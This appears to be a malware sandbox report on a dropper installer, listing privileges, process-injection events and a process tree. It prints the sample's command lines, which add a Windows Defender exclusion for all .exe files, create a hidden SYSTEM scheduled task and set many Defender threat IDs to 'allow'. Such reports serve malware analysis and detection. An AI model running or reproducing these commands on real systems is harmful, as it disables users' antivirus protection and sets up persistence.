Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3952 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe
PID 3952 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe
PID 3952 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe
PID 1648 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1648 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1648 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1632 wrote to memory of 4040 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1632 wrote to memory of 4040 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1632 wrote to memory of 4040 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4040 wrote to memory of 3168 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4040 wrote to memory of 3168 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4040 wrote to memory of 3168 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3168 wrote to memory of 1892 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 3168 wrote to memory of 1892 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 3168 wrote to memory of 1892 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 1648 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1648 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1648 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 4644 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\AsrnguO.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4644 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\AsrnguO.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4644 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\AsrnguO.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1112 wrote to memory of 3856 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1112 wrote to memory of 3856 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1112 wrote to memory of 3856 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3856 wrote to memory of 4112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3856 wrote to memory of 4112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3856 wrote to memory of 4112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 2404 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 2404 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 2404 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 1744 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 1744 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 1744 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 3396 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 3396 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 3396 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 4064 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 4064 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 4064 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 4464 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\gpupdate.exe
PID 1112 wrote to memory of 4464 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\gpupdate.exe
PID 1112 wrote to memory of 4464 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\gpupdate.exe
PID 1112 wrote to memory of 3632 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 3632 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 3632 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 2096 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 2096 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 2096 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 4924 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 4924 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 4924 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 4480 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 4480 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 4480 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 720 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 720 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 720 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 4396 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 4396 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 4396 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 3184 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 3184 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 3184 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 2304 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe

"C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe"

C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe

.\Install.exe /riRVBdidLX "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bjzvzwrptCEFdBfgJx" /SC once /ST 23:44:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\AsrnguO.exe\" Fi /Wgsite_idydi 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\AsrnguO.exe

C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\AsrnguO.exe Fi /Wgsite_idydi 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

